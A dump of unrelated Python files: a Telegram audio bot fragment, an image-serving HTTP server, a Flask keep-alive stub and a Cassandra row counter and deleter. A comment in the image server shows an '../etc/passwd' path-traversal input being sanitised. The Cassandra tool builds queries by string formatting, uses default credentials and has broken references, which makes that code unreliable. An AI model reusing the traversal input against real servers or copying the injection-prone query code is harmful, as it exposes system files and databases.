bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text="*Sorry*, downloaded file `{}` is `{}` MB and it is larger than I could convert (`{} MB`)".format(
file_name, exc.file_size // 1000000,
self.MAX_CONVERT_FILE_SIZE // 1000000),
parse_mode='Markdown')
except FileSplittedPartiallyError as exc:
file_parts = exc.file_parts
logger.exception("Splitting failed: %s", file_name)
bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text="*Sorry*, not enough memory to convert file `{}`..".format(
file_name),
parse_mode='Markdown')
except FileNotConvertedError as exc:
logger.exception("Converting failed: %s", file_name)
bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text="*Sorry*, could not convert file `{}`..".format(
file_name),
parse_mode='Markdown')
try:
caption = None
flood = self.chat_storage[str(chat_id)]["settings"]["flood"]
if flood == "yes":
addition = ""
url_obj = URL(url)
if self.SITES["yt"] in url_obj.host:
source = "YouTube"
file_root, file_ext = os.path.splitext(file_name)
file_title = file_root  # splitext already strips the extension
addition = ": " + file_title
elif self.SITES["sc"] in url_obj.host:
source = "SoundCloud"
elif self.SITES["bc"] in url_obj.host:
source = "Bandcamp"
else:
source = url_obj.host.replace(".com", "").replace("www.", "").replace("m.", "")
# if "youtu.be" in url_obj.host:
# url = url.replace("http://", "").replace("https://", "")
# else:
# url = shorten_url(url)
caption = "@{} _got it from_ [{}]({}){}".format(self.bot_username.replace("_", "\_"),
source, url, addition.replace("_", "\_"))
# logger.info(caption)
sent_audio_ids = self.send_audio_file_parts(bot, chat_id, file_parts,
reply_to_message_id if flood == "yes" else None,
caption)
except FileSentPartiallyError as exc:
sent_audio_ids = exc.sent_audio_ids
bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text="*Sorry*, could not send file `{}` or some of it's parts..".format(
file_name),
parse_mode='Markdown')
logger.warning("Sending some parts failed: %s", file_name)
if not self.SERVE_AUDIO:
shutil.rmtree(download_dir, ignore_errors=True)
if wait_message_id: # TODO: delete only once
try:
bot.delete_message(chat_id=chat_id, message_id=wait_message_id)
except:
pass
def convert_and_split_audio_file(self, file=""):
file_root, file_ext = os.path.splitext(file)
file_format = file_ext.replace(".", "").lower()
file_size = os.path.getsize(file)
# FIXME unknown_video is for tiktok
if file_format not in ["mp3", "m4a", "mp4", "unknown_video"]:
raise FileNotSupportedError(file_format)
if file_size > self.MAX_CONVERT_FILE_SIZE:
raise FileTooLargeError(file_size)
# FIXME unknown_video is for tiktok
if file_format not in ["mp3", "unknown_video"]:
logger.info("Converting: %s", file)
try:
file_converted = file.replace(file_ext, ".mp3")
ffinput = ffmpeg.input(file)
ffmpeg.output(ffinput, file_converted, audio_bitrate="128k", vn=None).run()
file = file_converted
file_root, file_ext = os.path.splitext(file)
file_format = file_ext.replace(".", "").lower()
file_size = os.path.getsize(file)
except Exception:
# TODO exceptions
raise FileNotConvertedError
file_parts = []
if file_size <= self.MAX_TG_FILE_SIZE:
file_parts.append(file)
else:
logger.info("Splitting: %s", file)
id3 = None
try:
id3 = ID3(file, translate=False)
except:
pass
parts_number = file_size // self.MAX_TG_FILE_SIZE + 1
# https://github.com/c0decracker/video-splitter
# https://superuser.com/a/1354956/464797
try:
# file_duration = float(ffmpeg.probe(file)['format']['duration'])
part_size = file_size // parts_number
cur_position = 0
for i in range(parts_number):
file_part = file.replace(file_ext, ".part{}{}".format(str(i + 1), file_ext))
ffinput = ffmpeg.input(file)
if i == (parts_number - 1):
ffmpeg.output(ffinput, file_part, codec="copy", vn=None, ss=cur_position).run()
else:
ffmpeg.output(ffinput, file_part, codec="copy", vn=None, ss=cur_position, fs=part_size).run()
part_duration = float(ffmpeg.probe(file_part)['format']['duration'])
cur_position += part_duration
if id3:
try:
id3.save(file_part, v1=2, v2_version=4)
except:
pass
file_parts.append(file_part)
except Exception:
# TODO exceptions
raise FileSplittedPartiallyError(file_parts)
return file_parts
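# Worked example of the splitting arithmetic above (the file size is an assumption):
#   a 100 MB mp3 with MAX_TG_FILE_SIZE = 45_000_000 gives
#   parts_number = 100_000_000 // 45_000_000 + 1 = 3 and part_size ~= 33.3 MB,
#   so ffmpeg copies three ~33 MB chunks, advancing ss by each part's probed duration.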
def send_audio_file_parts(self, bot, chat_id, file_parts, reply_to_message_id=None, caption=None):
sent_audio_ids = []
for index, file_part in enumerate(file_parts):
path = pathlib.Path(file_part)
file_name = os.path.split(file_part)[-1]
# file_name = translit(file_name, 'ru', reversed=True)
logger.info("Sending: %s", file_name)
bot.send_chat_action(chat_id=chat_id, action=ChatAction.UPLOAD_AUDIO)
caption_part = None
if len(file_parts) > 1:
caption_part = "Part {} of {}".format(str(index + 1), str(len(file_parts)))
if caption:
if caption_part:
caption_full = caption_part + " | " + caption
else:
caption_full = caption
else:
if caption_part:
caption_full = caption_part
else:
caption_full = ""
# caption_full = textwrap.shorten(caption_full, width=190, placeholder="..")
for i in range(3):
try:
if file_part.endswith('.mp3'):
mp3 = MP3(file_part)
duration = round(mp3.info.length)
performer = None
title = None
try:
performer = ", ".join(mp3['artist'])
title = ", ".join(mp3['title'])
except:
pass
if self.SERVE_AUDIO:
audio = str(urljoin(self.APP_URL, str(path.relative_to(self.DL_DIR))))
logger.debug(audio)
else:
audio = open(file_part, 'rb')
if i > 0:
# maybe: Reply message not found
reply_to_message_id = None
audio_msg = bot.send_audio(chat_id=chat_id,
reply_to_message_id=reply_to_message_id,
audio=audio,
duration=duration,
performer=performer,
title=title,
caption=caption_full,
parse_mode='Markdown')
sent_audio_ids.append(audio_msg.audio.file_id)
logger.info("Sending succeeded: %s", file_name)
break
# FIXME unknown_video is for tiktok
elif file_part.endswith('.unknown_video'):
video = open(file_part, 'rb')
video_msg = bot.send_video(chat_id=chat_id,
reply_to_message_id=reply_to_message_id,
video=video,
# duration=duration,
caption=caption_full,
parse_mode='Markdown')
sent_audio_ids.append(video_msg.video.file_id)
logger.info("Sending succeeded: %s", file_name)
break
except TelegramError:
if i == 2:
logger.exception("Sending failed because of TelegramError: %s", file_name)
if len(sent_audio_ids) != len(file_parts):
raise FileSentPartiallyError(sent_audio_ids)
return sent_audio_ids
|
server.py
|
import os
import io
import json
import time
import threading
import queue
from http import HTTPStatus
from urllib.parse import unquote
from PIL import Image
from network import HTTPBaseServer, HTTPResponseHeader
app_dir = os.path.split(os.path.realpath(__file__))[0]
index_path = os.path.join(app_dir, 'index.html')
def loadfile(path, mode='r', encoding='utf-8'):
with open(path, mode, encoding=encoding) as f:
return f.read()
class HTTPImageServer():
def __init__(self, bind_addr, imgroot='.', thumbnail='webp', allowcros=True, loglevel=2, favicon=None):
self.server = HTTPBaseServer(request_handler=self.handle, bind_addr=bind_addr)
self.imgroot = imgroot
self.img_extension = ['png', 'jpg', 'jpeg', 'tiff', 'webp', 'bmp']
self.print_lock = threading.Lock()
self.logqueue = queue.Queue()
self.thumbnail = thumbnail
self.allowcros = allowcros
self.loglevel = loglevel  # log threshold: 0 or 1 logs all requests, 2 skips image requests, 3 disables logging
self.icon = None
if favicon is not None:
with open(favicon, 'rb') as f:
self.icon = f.read()
def start(self, back=True):
t = threading.Thread(target=self.logger, name='Logger thread', daemon=True)
t.start()
self.server.start(back=back)
def logger(self):
while True:
try:
msg = self.logqueue.get(timeout=1)
print(msg)
except queue.Empty:
pass
@staticmethod
def parse_url(url):
location = url.split('?')[0]
params_str = url[len(location)+1:]
location = unquote(location)
params = {}
splits = params_str.split('&')
for split in splits:
split = unquote(split)
eq_pos = split.find('=')
if eq_pos == -1:
params[split] = None
continue
else:
key = split[:eq_pos]
value = split[eq_pos+1:]
params[key] = value
return location, params
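# Illustrative parse (the URL is an assumption):
#   parse_url('/img?path=summer%20trip/cat.jpg&width=200')
#     -> ('/img', {'path': 'summer trip/cat.jpg', 'width': '200'})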
def log(self, msg):
self.logqueue.put(msg)
def response(self, connection, header, content, loglevel=1):
if loglevel >= self.loglevel:
msg = '[{time}] {method}: {url} - {stat}'.format(
time = time.strftime("%H:%M:%S", time.localtime()),
method = connection.header.method,
url = connection.header.url,
stat = '{0}({1})'.format(header.code, HTTPStatus(header.code).phrase)
)
self.log(msg)
header['Content-Length'] = len(content)
if self.allowcros:
header['Access-Control-Allow-Origin'] = '*'
connection.write(header.encode() + b'\r\n\r\n')
connection.write(content)
def response_404(self, connection):
header = HTTPResponseHeader(404)
content = b'404 Not Found'
self.response(connection, header, content)
@staticmethod
def safe_path(path):
path = '/'.join(path.split('\\'))
path = path.split('/')
path = [p for p in path if p not in ['', '..', '.']]
path = '/'.join(path)
return path
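# Illustrative sanitisation (the input is an assumption):
#   safe_path('..\\..\\etc/passwd') -> 'etc/passwd'   # '..', '.' and empty segments are dropped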
def handle_index(self, params):
if 'path' not in params:
return HTTPResponseHeader(404), b'404 Not Found'
directory = params['path']
while '\\' in directory:
directory = directory.replace('\\', '/')
directory = self.safe_path(directory)
disk_directory = os.path.join(self.imgroot, directory)
filenames = []
try:
filenames = os.listdir(disk_directory)
filenames.sort()
except Exception:
pass
response = {"dirs": [], "imgs": []}
for filename in filenames:
full_path = os.path.join(disk_directory, filename)
request_path = '/{0}/{1}'.format(directory, filename)
request_path = '/' + request_path.strip('/\\')
if os.path.isdir(full_path):
response['dirs'].append(request_path)
else:
if filename.split('.')[-1] in self.img_extension:
response['imgs'].append(request_path)
response = json.dumps(response).encode('utf-8')
return HTTPResponseHeader(200), response
def handle_image(self, params):
invalid_request = False
if 'path' not in params:
# bail out early: indexing params['path'] below would raise KeyError
return HTTPResponseHeader(404), b'404 Not Found'
filepath = params['path']
filepath = self.safe_path(filepath)
full_path = os.path.join(self.imgroot, filepath)
if filepath.split('.')[-1] not in self.img_extension:
invalid_request = True
elif not os.path.isfile(full_path):
invalid_request = True
# parse height and width limit.
max_h, max_w = None, None
try:
if 'height' in params:
max_h = int(params['height'])
if 'width' in params:  # allow height and width together; the smaller ratio wins below
max_w = int(params['width'])
except Exception:
invalid_request = True
if invalid_request:
return HTTPResponseHeader(404), b'404 Not Found'
header = HTTPResponseHeader(200)
content = b''
if max_h is not None or max_w is not None:
img = Image.open(full_path)
real_w, real_h = img.size
h_ratio = None
w_ratio = None
if max_h is not None:
h_ratio = max_h / real_h
h_ratio = h_ratio if h_ratio < 1 else 1
if max_w is not None:
w_ratio = max_w / real_w
w_ratio = w_ratio if w_ratio < 1 else 1
max_ratio = 0
if h_ratio is None:
max_ratio = w_ratio
elif w_ratio is None:
max_ratio = h_ratio
else:
max_ratio = h_ratio if h_ratio < w_ratio else w_ratio
new_h, new_w = (real_h * max_ratio, real_w * max_ratio)
img = img.resize((int(new_w), int(new_h)))
img_stream = io.BytesIO()
img.save(img_stream, format=self.thumbnail)  # save() returns None, so don't rebind img
content = img_stream.getvalue()
else:
with open(full_path, 'rb') as f:
content = f.read()
return header, content
"""
request_type:
request index: http://domain.com/directory?path=relative/path/to/file
request image: http://domain.com/img?path=relative/path/to/file&height=100px&width=200px
"""
def handle(self, connection):
method = connection.header.method
if method != 'GET':
self.response_404(connection)
return
url = connection.header.url
location, params = self.parse_url(url)
location = location.strip('/\\')
header, content = None, None
loglevel = 0
if location == 'directory':
header, content = self.handle_index(params)
loglevel = 2
elif location == 'img':
header, content = self.handle_image(params)
loglevel = 1
elif location in ['', 'index', 'index.html']:
header = HTTPResponseHeader(200)
content = loadfile(index_path).encode('utf-8')
loglevel = 2
elif location == 'favicon.ico':
if self.icon is not None:
header = HTTPResponseHeader(200)
header['Content-Type'] = 'image/x-icon'
content = self.icon
else:
header = HTTPResponseHeader(404)
content = b''
loglevel = 2
else:
header = HTTPResponseHeader(404)
content = b'Please Do Not Try To Access Non-Image File!'
loglevel = 2
self.response(connection, header, content, loglevel=loglevel)
def str2bool(string):
positive = ['true',
't',
'y',
'yes',
'1',
'correct',
'accept',
'positive'
]
if string.lower() in positive:
return True
else:
return False
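# e.g. str2bool('Yes') -> True, str2bool('0') -> False (anything outside the positive list is False)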
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser('HTTPImageServer')
conf_path = 'config.json'
# load default configuration first.
defaults = {
"port": 80,
"interface": "0.0.0.0",
"root": ".",
"thumbnail": "webp",
"cros": True,
"loglevel": 2,
}
config = defaults
if os.path.isfile(conf_path):
with open(conf_path, 'r', encoding='utf-8') as f:
config.update(json.load(f))
else:
with open(conf_path, 'w+', encoding='utf-8') as f:
json.dump(config, f, indent=4, ensure_ascii=False)
parser.add_argument('--port', '-p', type=int, default=None, help='port to start the server on.')
parser.add_argument('--interface', '-i', type=str, default=None, help='interface to bind; default is 0.0.0.0 for all interfaces.')
parser.add_argument('--root', '-r', type=str, default=None, help='web root directory; default is the current directory.')
parser.add_argument('--thumbnail', '-t', type=str, default=None, help='thumbnail format; default is webp, switch to jpeg if you have any trouble.')
parser.add_argument('--cros', type=str2bool, default=None, help='enable or disable CORS (cross-origin requests); default is enabled.')
parser.add_argument('--loglevel', '-l', type=int, default=None, help='log level: 0 or 1 logs all requests, 2 skips image requests, 3 disables logging.')
parser.add_argument('--save', default=False, action='store_true', help='save the configuration as default.')
args = parser.parse_args()
parsed = {key:value for key, value in args.__dict__.items() if value is not None}
config.update(parsed)
args.__dict__.update(config)
if args.save:
config.pop('save')
with open(conf_path, 'w+', encoding='utf-8') as f:
json.dump(config, f, indent=4, ensure_ascii=False)
addr = '{0}:{1}'.format(args.interface, args.port)
print('Start HTTP server on {0} and use web root as {1}'.format(addr, args.root))
server = HTTPImageServer(bind_addr=addr, imgroot=args.root, thumbnail=args.thumbnail, allowcros=args.cros, loglevel=args.loglevel, favicon='./favicon.ico')
server.start(back=False)
|
webserver.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "Webserver OK, Discord Bot OK"
def run():
app.run(host='0.0.0.0',port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
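# Illustrative use from the bot's entry point (module layout assumed):
#   from webserver import keep_alive
#   keep_alive()  # serves "Webserver OK, Discord Bot OK" on 0.0.0.0:8080 in a background thread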
|
count.py
|
#!/usr/bin/env python3
#
# Trireme
#
# Cassandra database row counter and manipulator.
#
# kaspars@fx.lv
#
import argparse
import datetime
import logging
import queue
import sys
import threading
import multiprocessing
import time
import platform
import os
import random
from ssl import SSLContext, PROTOCOL_TLSv1, PROTOCOL_TLSv1_2
from cassandra.auth import PlainTextAuthProvider
from cassandra.cluster import Cluster
from cassandra.policies import DCAwareRoundRobinPolicy
from trireme.datastructures import Result, RowForDeletion, Token_range, Mapper_task, Queues, RuntimeSettings, CassandraSettings, \
CassandraWorkerTask
from trireme.presentation import human_time
# settings
import settings
from trireme.stats import stats_monitor, split_predicter
def parse_user_args():
"""Parse commandline arguments."""
parser = argparse.ArgumentParser()
parser.description = "Trireme - Cassandra row manipulator"
parser.add_argument("action",
type=str,
choices=[
"count-rows", "print-rows", "update-rows",
"delete-rows", "find-nulls", "find-wide-partitions"
],
help="What would you like to do?")
parser.add_argument("host", type=str, help="Cassandra host")
parser.add_argument("keyspace", type=str, help="Keyspace to use")
parser.add_argument("table", type=str, help="Table to use")
parser.add_argument("key", type=str, help="Key to use, when counting rows")
parser.add_argument("--extra-key",
type=str,
dest="extra_key",
help="Extra key, in case of compound primary key.")
parser.add_argument("--update-key",
type=str,
dest="update_key",
help="Update key.")
parser.add_argument("--update-value",
type=str,
dest="update_value",
help="Update value.")
parser.add_argument("--value-column",
type=str,
dest="value_column",
help="Value column.")
parser.add_argument("--filter-string",
type=str,
dest="filter_string",
help="Additional filter string. See docs.")
parser.add_argument("--split",
type=int,
default=18,
help="Split (see documentation)")
parser.add_argument("--workers",
type=int,
default=1,
help="Amount of worker processes to use")
parser.add_argument("--port",
type=int,
default=9042,
help="Cassandra port (9042 by default)")
parser.add_argument("--user",
type=str,
default="cassandra",
help="Cassandra username")
parser.add_argument("--password",
type=str,
default="cassandra",
help="Cassandra password")
parser.add_argument("--datacenter", type=str, default=None, help="Prefer this datacenter and use DCAwareRoundRobinPolicy")
parser.add_argument("--ssl-ca-cert", dest="cacert", type=str, default=None, help="CA cert to use")
parser.add_argument("--ssl-certificate",
dest="ssl_cert",
type=str,
help="SSL certificate to use")
parser.add_argument("--ssl-key",
type=str,
dest="ssl_key",
help="Key for the SSL certificate")
parser.add_argument("--ssl-use-tls-v1",
action="store_true",
dest="ssl_v1",
help="Use TLS1 instead of 1.2")
parser.add_argument("--debug",
action="store_true",
help="Enable DEBUG logging")
parser.add_argument("--min-token", type=int,
help="Min token")
parser.add_argument("--max-token", type=int,
help="Max token")
args = parser.parse_args()
return args
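# Illustrative command line (host/keyspace/table/key are assumptions):
#   python count.py count-rows cassandra01.example.com my_keyspace my_table id --split 18 --workers 4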
def get_cassandra_session(host,
port,
user,
password,
ssl_cert,
ssl_key,
dc, cacert=None,  # optional: some callers pass only seven positional arguments
ssl_v1=False):
"""Establish Cassandra connection and return session object."""
auth_provider = PlainTextAuthProvider(username=user, password=password)
py_version = platform.python_version_tuple()
if ssl_cert is None and ssl_key is None:
# skip setting up ssl
ssl_context = None
cluster = Cluster([host],
port=port,
auth_provider=auth_provider)
else:
if ssl_v1:
tls_version = PROTOCOL_TLSv1
else:
tls_version = PROTOCOL_TLSv1_2
if int(py_version[0]) == 3 and int(py_version[1]) > 4:
ssl_context = SSLContext(tls_version)
ssl_context.load_cert_chain(certfile=ssl_cert, keyfile=ssl_key)
if cacert:
ssl_context.load_verify_locations(cacert)
if dc:
cluster = Cluster([host],
port=port, load_balancing_policy=DCAwareRoundRobinPolicy(local_dc=dc),
ssl_context=ssl_context,
auth_provider=auth_provider)
else:
cluster = Cluster([host],
port=port,
ssl_context=ssl_context,
auth_provider=auth_provider)
else:
ssl_options = {'certfile': ssl_cert,
'keyfile': ssl_key,
'ssl_version': PROTOCOL_TLSv1_2}
cluster = Cluster([host],
port=port,
ssl_options=ssl_options,
auth_provider=auth_provider)
try:
session = cluster.connect()
except Exception as e:
print("Exception when connecting to Cassandra: {}".format(e.args[0]))
sys.exit(1)
return session
def find_null_cells(session, keyspace, table, key_column, value_column):
"""Scan table looking for 'Null' values in the specified column.
Finding 'Null' columns in a table.
'key_column' - the column that contains some meaningful key/id.
Your primary key most likely.
'value_column' - the column where you wish to search for 'Null'
Having 'Null' cells in Cassandra is the same as not having them.
However if you don't control the data model or cannot change it
for whatever reason but still want to know
how many such 'Null' cells you have, you are a bit out of luck.
Filtering by 'Null' is not something that you can do in Cassandra.
So what you can do is to query them and look for 'Null' in the result.
"""
# TODO: this is just a stub for now, not fully implemented
session.execute("use {}".format(keyspace))
sql_template = "select {key},{column} from {keyspace}.{table}"
result_list = []
sql = sql_template.format(keyspace=keyspace,
table=table,
key=key_column,
column=value_column)
logging.debug("Executing: {}".format(sql))
result = session.execute(sql)
result_list = [r for r in result if getattr(r, value_column) is None]
def batch_sql_query(sql_statement, key_name, key_list, dry_run=False):
"""Run a query on the specifies list of primary keys."""
for key in key_list:
if isinstance(key, dict):
sql = "{sql_statement} where ".format(sql_statement=sql_statement)
andcount = 0
for k in key:
value = key[k]
if isinstance(value, str):
value = "'{}'".format(value)
sql += "{key_name} = {key}".format(key_name=k, key=value)
if andcount < 1:
andcount += 1
sql += " and "
else:
sql = "{sql_statement} where {key_name} = {key}".format(
sql_statement=sql_statement, key_name=key_name, key=key)
logging.debug("Executing: {}".format(sql))
if dry_run:
logging.info("Would execute: {}".format(sql))
else:
result = session.execute(sql)
logging.debug(result)
time.sleep(0.1)
def execute_statement(sql_statement):
logging.debug("Deleting: {}".format(sql_statement))
result = session.execute(sql_statement)
return result
def process_reaper(process_queue):
max_attempts = 10
current = 0
logging.debug("Process reaper: there are {} processes in the queue".format(process_queue.qsize()))
while process_queue.qsize() > 0:
if current == max_attempts:
logging.debug("Process reaper exiting.")
break
current +=1
process = process_queue.get()
if process.is_alive():
logging.debug("Process {} is still running, putting back into queue".format(process))
process_queue.put(process)
else:
logging.debug("Reaping process {}".format(process))
def batch_executer(cas_settings,batch_q, batch_result_q):
logging.info("STARTING batch executor with batch q size: {}".format(batch_q.qsize()))
s = get_cassandra_session(cas_settings[0], cas_settings[1], cas_settings[2], cas_settings[3],
cas_settings[4], cas_settings[5], cas_settings[6])
time.sleep(10)
while batch_q.qsize() >0:
try:
(min, max, sql) = batch_q.get()
logging.info("Executing via BATCH: {}".format(sql))
result = s.execute(sql)
r = Result(min, max, result)
batch_result_q.put(r)
logging.info("Result: {}".format(r))
except Exception as e:
logging.warning(
"Got Cassandra exception: "
"{msg} when running query: {sql}"
.format(sql=sql, msg=e))
def sql_query_q(cas_settings, delete_queue, getter_counter, sql_statement, key_column, result_list, failcount,
split_queue, filter_string, kill_queue, extra_key):
while True:
if kill_queue.qsize() > 0:
logging.warning("Aborting query on request.")
return
if split_queue.qsize() >0:
if delete_queue.qsize() > 2000: # TODO: 2000 should be enough for anyone, right? :)
# slow down with SELECTS if the DELETE queue is already big,
# as there is no point running if DELETE is not keeping up
time.sleep(1)
if extra_key:
sql_base_template = "{sql_statement} where token({key_column}, {extra_key}) " \
">= {min} and token({key_column}, {extra_key}) < {max}"
else:
sql_base_template = "{sql_statement} where token({key_column}) " \
">= {min} and token({key_column}) < {max}"
if filter_string:
sql_base_template += " and {}".format(filter_string)
# prepare query for execution and then based on queue size, either execute within this thread or delegate in a batch to a separate process
if split_queue.qsize() > 1000:
# do the batch approach and get a list of splits from the queue
batch_q = multiprocessing.Queue()
batch_result_q = multiprocessing.Queue()
for i in range(100):
(min, max) = split_queue.get()
sql = sql_base_template.format(sql_statement=sql_statement,
min=min,
max=max,
key_column=key_column, extra_key=extra_key)
batch_q.put((min, max, sql))
p = multiprocessing.Process(target=batch_executer, args=(cas_settings,batch_q, batch_result_q))
p.start()
logging.info("Batch finished: {} / {} ".format(batch_q.qsize(), batch_result_q.qsize()))
else:
# handle query here in the thread
(min, max) = split_queue.get()
sql = sql_base_template.format(sql_statement=sql_statement,
min=min,
max=max,
key_column=key_column, extra_key=extra_key)
try:
if result_list.qsize() % 100 == 0:
logging.debug("Executing: {}".format(sql))
result = session.execute(sql)
getter_counter.put(0)
r = Result(min, max, result)
result_list.put(r)
except Exception as e:
failcount += 1
logging.warning(
"Got Cassandra exception: "
"{msg} when running query: {sql}"
.format(sql=sql, msg=e))
else:
logging.debug("Stopping getter thread due to zero split queue size.")
break
def sql_query(sql_statement, key_column, result_list, failcount, sql_list,
filter_string, kill_queue, extra_key):
while len(sql_list) > 0:
if kill_queue.qsize() > 0:
logging.warning("Aborting query on request.")
return
(min, max) = sql_list.pop()
if extra_key:
sql_base_template = "{sql_statement} where token({key_column}, {extra_key}) " \
">= {min} and token({key_column}, {extra_key}) < {max}"
else:
sql_base_template = "{sql_statement} where token({key_column}) " \
">= {min} and token({key_column}) < {max}"
if filter_string:
sql_base_template += " and {}".format(filter_string)
sql = sql_base_template.format(sql_statement=sql_statement,
min=min,
max=max,
key_column=key_column, extra_key=extra_key)
try:
if result_list.qsize() % 100 == 0:
logging.debug("Executing: {}".format(sql))
result = session.execute(sql)
r = Result(min, max, result)
result_list.put(r)
except Exception as e:
failcount += 1
logging.warning(
"Got Cassandra exception: "
"{msg} when running query: {sql}"
.format(sql=sql, msg=e))
def splitter(queues, rsettings):
tr = rsettings.tr
i = tr.min
predicted_split_count = split_predicter(tr, rsettings.split)
logging.info("Preparing splits with split size {}".format(rsettings.split))
logging.info("Predicted split count is {} splits".format(predicted_split_count))
splitcounter = 0
while i <= tr.max - 1:
if queues.split_queue.full():
logging.debug("There are {} splits prepared. Pausing for a second.".format(splitcounter))
time.sleep(0.5)
else:
i_max = i + pow(10, rsettings.split)
if i_max > tr.max:
i_max = tr.max # don't go higher than max_token
queues.split_queue.put((i, i_max))
queues.stats_queue_splits.put(0)
splitcounter+=1
i = i_max
# kill pill for split queue, signaling that we are done
queues.split_queue.put(False)
logging.debug("Splitter is done. All splits created")
def distributed_sql_query(sql_statement, cas_settings, queues, rsettings):
start_time = datetime.datetime.now()
result_list = result_queue
failcount = 0
thread_count = 1
kill_queue = queue.Queue() # TODO: change this to an event?
backoff_counter = 0
tm = None
try:
while True:
if split_queue.qsize() >0:
if backoff_counter >0:
backoff_counter =0 # reset backoff counter
if get_process_queue.qsize() < thread_count:
thread = threading.Thread(
target=sql_query_q,
args=(cas_settings,delete_queue,getter_counter,sql_statement, key_column, result_list, failcount,
split_queue, filter_string, kill_queue, extra_key))
thread.start()
logging.info("Started thread {}".format(thread))
get_process_queue.put(thread)
else:
logging.info("Max process count reached")
logging.info("{} more queries remaining".format(split_queue.qsize()))
res_count = result_list.qsize()
logging.info("{} results so far".format(res_count))
n = datetime.datetime.now()
delta = n - start_time
elapsed_time = delta.total_seconds()
logging.info("Elapsed time: {}.".format(
human_time(elapsed_time)))
if res_count > 0:
result_per_sec = res_count / elapsed_time
logging.info("{} results / s".format(result_per_sec))
time.sleep(10)
else:
backoff_counter += 1
logging.debug("No splits in the split queue. Will sleep {} sec".format(backoff_counter))
time.sleep(backoff_counter)
process_reaper(get_process_queue)
except KeyboardInterrupt:
logging.warning("Ctrl+c pressed, asking all threads to stop.")
kill_queue.put(0)
time.sleep(2)
logging.info("{} more queries remaining".format(split_queue.qsize()))
logging.info("{} results so far".format(res_count))
if failcount > 0:
logging.warning(
"There were {} failures during the query.".format(failcount))
return result_list
def threaded_reductor(input_queue, output_queue):
"""Do the reduce part of map/reduce and return a list of rows."""
backoff_timer = 0
while True:
if input_queue.qsize() == 0:
backoff_timer+=1
logging.debug("No results to reduce, reducer waiting for {} sec".format(backoff_timer))
time.sleep(backoff_timer)
else:
if backoff_timer >0:
backoff_timer = 0
result = input_queue.get()
for row in result.value:
# for deletion, we want to be token range aware, so we pass token range information as well
rd = RowForDeletion(result.min, result.max, row)
output_queue.put(rd)
def delete_preparer(delete_preparer_queue, delete_queue, keyspace, table, key, extra_key):
sql_template = "delete from {keyspace}.{table}"
sql_statement = sql_template.format(keyspace=keyspace, table=table)
backoff_timer=0
while True:
if delete_preparer_queue.qsize() == 0:
backoff_timer+=1
logging.debug("Delete preparer sleeping for {} sec".format(backoff_timer))
time.sleep(backoff_timer)
else:
if backoff_timer > 0:
backoff_timer = 0 #reset backoff timer
# get item from queue
row_to_prepare_with_tokens = delete_preparer_queue.get()
row_to_prepare = row_to_prepare_with_tokens.row
prepared_dictionary = {}
prepared_dictionary[key] = getattr(row_to_prepare, key)
prepared_dictionary[extra_key] = getattr(row_to_prepare, extra_key)
token_min = "token({key},{extra_key}) >= {token_min}".format(key=key, extra_key=extra_key,token_min=row_to_prepare_with_tokens.min)
token_max = "token({key},{extra_key}) < {token_max}".format(key=key, extra_key=extra_key,token_max=row_to_prepare_with_tokens.max)
sql = "{sql_statement} where {token_min} and {token_max} and ".format(sql_statement=sql_statement, token_min=token_min, token_max=token_max)
#
#
andcount = 0
for rkey in prepared_dictionary:
value = prepared_dictionary[rkey]
# cassandra is timezone aware, however the response that we would have received
# previously does not contain timezone, so we need to add it manually
if isinstance(value, datetime.datetime):
value = value.replace(tzinfo=datetime.timezone.utc)
value = "'{}'".format(value)
sql += "{key_name} = {qkey}".format(key_name=rkey, qkey=value)
if andcount < 1:
andcount += 1
sql += " and "
delete_queue.put(sql)
def delete_rows(queues, rsettings):
for row in get_rows(queues, rsettings):
sql_template = "delete from {keyspace}.{table} where token({key},{extra_key}) >= {min} and token({key},{extra_key}) < {max} and {key} = '{value}' and {extra_key} = '{extra_value}'"
sql_statement = sql_template.format(keyspace=rsettings.keyspace, table=rsettings.table, key=rsettings.key, extra_key=rsettings.extra_key, min=row.min, max=row.max, value=row.value.get(rsettings.key), extra_value=utc_time(row.value.get(rsettings.extra_key)))
t = CassandraWorkerTask(sql_statement, (row.min, row.max))
t.task_type = "delete" # used for statistics purpose only
queues.worker_queue.put(t)
queues.stats_queue_delete_scheduled.put(0)
def update_rows(session,
keyspace,
table,
key,
update_key,
update_value,
split,
filter_string,
extra_key=None):
"""Update specified rows by setting 'update_key' to 'update_value'.
When updating rows in Cassandra you can't filter by token range.
So what we do is find all the primary keys for the rows that
we would like to update, and then run an update in a for loop.
"""
session.execute("use {}".format(keyspace))
rows = get_rows(session, keyspace, table, key, split, update_key,
filter_string, extra_key)
update_list = []
for row in rows:
if extra_key:
update_list.append({
key: getattr(row, key),
extra_key: getattr(row, extra_key)
}) # use tuple of key, extra_key
else:
update_list.append(getattr(row, key))
logging.info("Updating {} rows".format(len(update_list)))
logging.info(
"Updating rows and setting {update_key} to new value "
"{update_value} where filtering string is: {filter_string}"
.format(update_key=update_key,
update_value=update_value,
filter_string=filter_string))
    # Surround the update value with quotes in case it is a string,
    # but skip the quoting if the string actually represents a boolean.
booleans = ["true", "false"]
if isinstance(update_value, str):
if update_value.lower() not in booleans:
update_value = "'{}'".format(update_value)
sql_template = "update {keyspace}.{table} set "\
"{update_key} = {update_value}"
sql_statement = sql_template.format(keyspace=keyspace,
table=table,
update_key=update_key,
update_value=update_value)
logging.info(sql_statement)
while True:
response = input(
"Are you sure you want to continue? (y/n)").lower().strip()
if response == "y":
break
elif response == "n":
logging.warning("Aborting upon user request")
return 1
result = batch_sql_query(sql_statement, key, update_list, False)
logging.info("Operation complete.")
def get_rows(queues, rsettings):
"""Generator that returns rows as we get them from worker"""
sql_template = "select * from {keyspace}.{table}"
sql_statement = sql_template.format(keyspace=rsettings.keyspace, table=rsettings.table)
mt = Mapper_task(sql_statement, rsettings.key, rsettings.filter_string)
mt.parser = get_result_parser
queues.mapper_queue.put(mt)
while True:
if queues.results_queue.empty():
logging.debug("Waiting on results...")
time.sleep(5)
else:
yield queues.results_queue.get()
queues.stats_queue_results_consumed.put(0)
def get_rows_count(queues, rsettings):
sql_template = "select count(*) from {keyspace}.{table}"
